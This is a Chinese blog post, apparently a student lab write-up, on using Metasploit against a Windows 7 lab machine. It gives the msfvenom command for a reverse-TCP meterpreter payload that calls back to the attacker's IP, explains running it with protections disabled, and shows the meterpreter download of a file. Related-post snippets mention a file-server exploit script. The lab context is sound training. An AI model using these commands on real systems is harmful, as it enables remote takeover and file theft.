Metasploit应用

已于 2022-11-05 21:11:20 修改
阅读量688 收藏
点赞数
文章标签: 网络安全
于 2022-11-05 21:11:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64005272/article/details/127709153
版权

目录

一、实验环境

二、实验内容

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

一、实验环境

攻击机:kali

靶机:windows

二、实验内容

1、生成主控端、被控端。

使用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.131.128 lport=5000 -f exe -o /var/payload.exe

lhost的值为Kali的ip,保存的位置为:/var/payload.exe

在var文件目录下找到payload.exe

将文件拖到靶机win7上,要提前关闭防火墙和杀毒软件,然后打开它。

2、获得靶机(Windows)控制权。

回到Kali,输入命令:msfconsole启动Metasploit,使用handler作为主控端。

3、下载靶机上任意一个文件。

在C盘随便创建一个文本文件

接下来输入命令:download C:\\hh.txt /home/   下载hh.txt文件到home文件夹里。

结果在home文件夹中找到hh.txt。漏洞复现完毕。

机智的Jerry
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit简单应用
m0_48907714的博客
03-09 8343
Metasploit简单应用
复现任务A
m0_65354386的博客
11-17 241
靶机(Windows)漏洞渗透测试及Metasploit应用
攻击篇--远程控制(一)生成被控端与主控端
qq_40424448的博客
06-03 4484
笑脸漏洞与6200 如果目标主机被使用笑脸漏洞成功渗透,那么会自动在6200端口打开一个连接,可以实现攻击者对目标主机的控制。这是一个很经典的案例,如果将这个连接比作是正好能让一个人爬行通过,那么接下来的远程控制篇就是如何将这个缺口变大,大的卡车都可以自由出入。而这个大的入口,就是我们平常所说的远程控制。 netcat ......
Metasploit 中文手册.pdf
06-27
Metasploit软件帮助安全专家和 IT 专家识别安全问题、验证漏洞修复情况...本 POC 指南的内容涉及智能入侵测定、密码审计、web 应用程序扫描和社会工程。Metasploit 帮助团队进行协作,并在整合的报告中显示其发现结果。
metasploit中文操作手册
01-30
metasploit中文操作手册 Metasploit® 软件帮助安全专家和IT 专家识别...本POC 指南的内容涉及智能入侵测定、密码审计、web 应用程序扫描和社会工程。 Metasploit 帮助团队进行协作,并在整合的报告中显示其发现结果。
metasploit
01-02
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的...这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Metasploit读书笔记
09-12
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的...这些功能包括智能开发,密码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现
( Metasploit漏洞利用基础教程
11-03
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的...这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
easy file sharing server漏洞渗透测试及Metasploit应用
zzzfff__的博客
11-06 416
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。
【简单远程控制】 Metasploit应用
qq_61947585的博客
11-21 1139
远程控制 Metasploit应用
metasploit 使用教程
热门推荐
jiangliuzheng的专栏
01-20 10万+
METASPLOIT基础入门 1、基础知识 1.1 简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasp
A:漏洞渗透测试和Metasploit应用
weixin_53130100的博客
12-01 223
在Windows中安装easyfile sharing 回到kali 使用nmap -sV 192.168.43.162 使用python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.43.162 8000 回到window 发现其已经调出了计算器
复现实验A
qq_23690313的博客
12-13 2349
复现实验A 一、漏洞渗透测试 1、靶机安装easy file sharing server(efssetup_2018.zip) 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100 3、利用该漏洞,使得靶机运行计算器。P116-119 (1)找出可利用脚本 39009.py (2) (3)调取成功 二、Metasploit应用 1、生成主控端、被控端。 首先打开终端输入msfvenom -p windows/meterpreter/reverse_tcp lhost= 攻击
Metasploit靶机漏洞实践检验
Birldlee的博客
12-27 1万+
使用Metasploit渗透测试软件对Metasploitable靶机系统主机进行攻击,检验各种常见靶机漏洞的情况。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8288
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
患者发生输液反应的应急预案及护理流程(医院护理资料).docx
最新发布
06-15
患者发生输液反应的应急预案及护理流程(医院护理资料).docx
metasploit应用
09-11
Metasploit是一个开源的渗透测试工具,用于评估和测试计算机系统的安全性。它提供了多种利用和漏洞扫描技术,帮助安全专业人员发现和利用系统中的漏洞。 Metasploit应用包括: 1. 漏洞评估:Metasploit可以帮助安全团队评估系统中存在的漏洞,并验证其是否可以被利用。通过使用Metasploit框架提供的模块,可以自动化执行漏洞扫描和漏洞利用过程。 2. 渗透测试:Metasploit可以模拟黑客攻击,对目标系统进行渗透测试。安全专业人员可以使用Metasploit框架中的各种模块和技术,如远程命令执行、缓冲区溢出等,以测试系统的安全性,并帮助组织修补潜在的漏洞。 3. 恶意软件分析:Metasploit提供了一些工具和技术,用于分析和研究恶意软件。安全研究人员可以使用Metasploit来分析恶意软件的行为、寻找漏洞和发现新的攻击方法。 4. 安全教育:Metasploit可以用作安全培训和教育的工具。通过使用Metasploit,安全专业人员可以模拟真实的攻击场景,让学习者了解攻击者的思维和方法,并加深对安全防御的理解。 需要注意的是,Metasploit是一个强大的工具,但在使用时必须遵守法律和道德规范,仅用于授权和合法的目的。不当使用Metasploit可能会导致违法行为和对他人造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值